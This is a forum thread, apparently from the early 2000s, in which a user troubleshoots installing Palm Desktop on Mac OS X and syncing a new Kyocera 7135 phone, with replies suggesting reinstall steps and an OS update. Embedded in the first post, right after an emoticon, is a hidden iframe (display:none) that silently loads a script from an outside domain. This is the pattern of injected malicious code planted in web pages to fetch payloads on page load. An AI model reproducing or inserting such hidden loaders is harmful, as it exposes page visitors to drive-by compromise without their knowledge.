My phone arrived today and has been successfully activated on Verizon. Now I have synched my old Palm Vx, per the directions, and attempted to install Palm Desktop 4.x (for Mac) from the CD. Every time, it gets to about 760 of the 788 files to install and craps out, with another installer icon popping into the dock (I'm running OS X) next to the first one. It then has me start the installation all over again, followed by an "installation unsuccessful" dialog box. HELP, please!! I wanna play with my new toy!!!
And yes, I have quit all other running apps, no virus protection running, etc. :anger<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
Okay, how about this one:
When I go to the palm.com site to d/l the current version of Palm desktop, it asks me what device I am using. Is this an idle question, or does it affect what is installed? They do not give any choices other than their own hardware. Should I just pick one and install it, or will I be causing more problems?
It didn't. Same double-installer thing happened. I realize this is only tangentially related to the 7135, it's just that I soo want to get it all set before I leave for the relatives' house on Sat.

Any ideas, anyone?
It's been a while since I played with Mac stuff. But here's a few ideas.
Try this. Make a copy of your palms user directory only.
Then uninstall the old palm desktop programs.
Then with no old info there, do a fresh install of the Palm Desktop to see if there is a clean install.
If so, then create a user ID of the same name your using now. then move the files from the saved folder to the newly created one.

Is it trying to install in OS X native mode or does it launch classic mode? You could try to install in 9.2.1. I sync at work on a PC but had a terrible time getting my wife's Palm V working on OS X.
Well, 'geek, it may come to that. I did what kniteman suggested above, too (I'd tried a version of that already), and still no dice.
I am not fond of "Classic mode," to say the least, but I will hold that in reserve for my last ditch effort. Meanwhile, I'm running software update to see if 10.2.3 (as opposed to 10.2.2) will help any. I'm not optimistic . . .
The system update must've done it--the Palm installer ran successfully! My next challenge is getting the 7135 to sync!! So far, my old trick of clicking "enable" AFTER pushing the cradle button isn't working, nor is pushing the button with Hot Sync Manager already enabled.
